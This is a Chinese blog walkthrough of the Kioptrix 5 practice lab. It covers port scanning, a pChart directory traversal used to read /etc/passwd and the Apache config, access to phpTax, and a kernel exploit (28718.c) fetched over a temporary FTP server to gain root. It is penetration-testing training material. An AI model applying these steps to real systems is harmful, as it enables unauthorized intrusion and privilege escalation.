菜单 学习猿地 - LMONKEY

VIP

开通学习猿地VIP

尊享10项VIP特权 持续新增

知识通关挑战

打卡带练!告别无效练习

接私单赚外块

VIP优先接,累计金额超百万

学习猿地私房课免费学

大厂实战课仅对VIP开放

你的一对一导师

每月可免费咨询大牛30次

领取更多软件工程师实用特权

入驻
30
0

kioptrix-5(2014)

原创
05/13 14:22
阅读数 60055

信息收集

image-20210417213933544

web 渗透

扫目录,80 端口没扫除什么值得注意的内容。而在 8080 端口扫出很多 403。

image-20210417220946627

卡住了,tcp、udp 都扫了,没见到有效的。难道要突破防火墙?或者说直接利用这些存在的模块?

前期交互都不成功,没一点思路了,先看看靶场描述,再看看 writeup。

看了 writeup 之后,发现在 80 端口下的主页注释中存在提示的。

image-20210420143809720

pchart cms

image-20210417223003064

尝试搜索 exp

image-20210417223429079

image-20210417223402369

发现有一个有用的目录遍历的漏洞。直接利用。

还好有漏洞,这个页面功能太多,要是手工测试的话可能有点耗时。

image-20210417223753832

读取 /etc/passwd

image-20210417223712343

访问 8080 端口被禁止,应该想到是 apache 配置问题,所以接下来的思路是尝试访问 apache 配置文件。

读取 apache 配置 httpd.conf。位于 /usr/local/etc/apache22/httpd.conf 。因为此处为 freebsd 系统,和通常 linux 存放位置不同。

image-20210417225001917

phptax cms

构造合适的 user-agent 头部,访问 8080 端口。

image-20210417225424998

继续尝试搜索 exp

image-20210417230000066

image-20210417225944360

image-20210417225911612

提权

收集提权信息

image-20210418104258218

image-20210418104430350

image-20210418104349434

image-20210418104552829

image-20210418104631434

# php session 文件
/var/tmp/sess_o35rfviapg9sm7iu3ol0mkvjh7
内核漏洞

image-20210420130327225

发现 28718.c 是有效的

# 主机上搭建临时 ftp 服务器
python3 -m pyftpdlib
# 靶机通过命令下载
ftp ftp://192.168.200.128:2121/28718.c

编译运行,获取到 root

image-20210420130912120

发表评论

0/200
30 点赞
0 评论
收藏
为你推荐 换一批